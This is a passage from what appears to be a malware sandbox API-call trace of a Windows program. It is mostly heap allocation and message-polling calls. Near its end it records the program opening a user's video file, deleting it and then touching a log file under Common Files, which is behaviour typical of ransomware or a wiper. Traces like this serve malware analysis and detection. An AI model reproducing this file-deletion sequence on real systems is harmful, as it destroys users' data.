(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0043.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0043.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0043.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0043.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0043.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0043.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0043.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0043.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.102] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0043.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0043.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0043.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7) returned 0x7da1f8 [0043.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x7da1f8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0043.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.102] GetProcAddress (hModule=0x76b40000, lpProcName="memset") returned 0x76b49790 [0043.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0043.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0043.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0043.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0043.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0043.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0043.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0043.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0043.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0043.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0043.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0043.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0043.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0043.104] FreeLibrary (hLibModule=0x76b40000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.105] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0043.105] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.105] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0043.105] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0043.105] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0043.105] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0043.105] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0043.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0043.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0043.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0043.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0043.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0043.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0043.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.106] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0043.106] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.107] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\h1ibodoxi-.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0043.107] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.107] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.107] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.107] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.107] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0043.107] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.107] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.107] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.108] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.108] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.108] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.108] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.108] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.108] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0043.108] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.108] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.108] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.111] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.111] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.111] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.111] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.111] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv", lpFilePart=0x0) returned 0x42 [0043.111] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9117ea0, ftCreationTime.dwHighDateTime=0x1d5bdcf, ftLastAccessTime.dwLowDateTime=0x86c483b0, ftLastAccessTime.dwHighDateTime=0x1d5c557, ftLastWriteTime.dwLowDateTime=0x1965fba0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x108fc, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="H1IbodoXI-.flv", cAlternateFileName="H1IBOD~1.FLV")) returned 0x7c2100 [0043.111] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\h1ibodoxi-.flv")) returned 1 [0043.113] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9117ea0, ftCreationTime.dwHighDateTime=0x1d5bdcf, ftLastAccessTime.dwLowDateTime=0x86c483b0, ftLastAccessTime.dwHighDateTime=0x1d5c557, ftLastWriteTime.dwLowDateTime=0x1965fba0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x108fc, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="H1IbodoXI-.flv", cAlternateFileName="H1IBOD~1.FLV")) returned 0 [0043.113] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.113] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.113] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.113] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.113] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.114] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.114] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.114] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.114] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.114] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.114] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.114] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0043.114] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.114] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.114] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0043.114] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x3697, lpOverlapped=0x0) returned 1 [0043.114] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0043.115] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x3697, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.115] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | 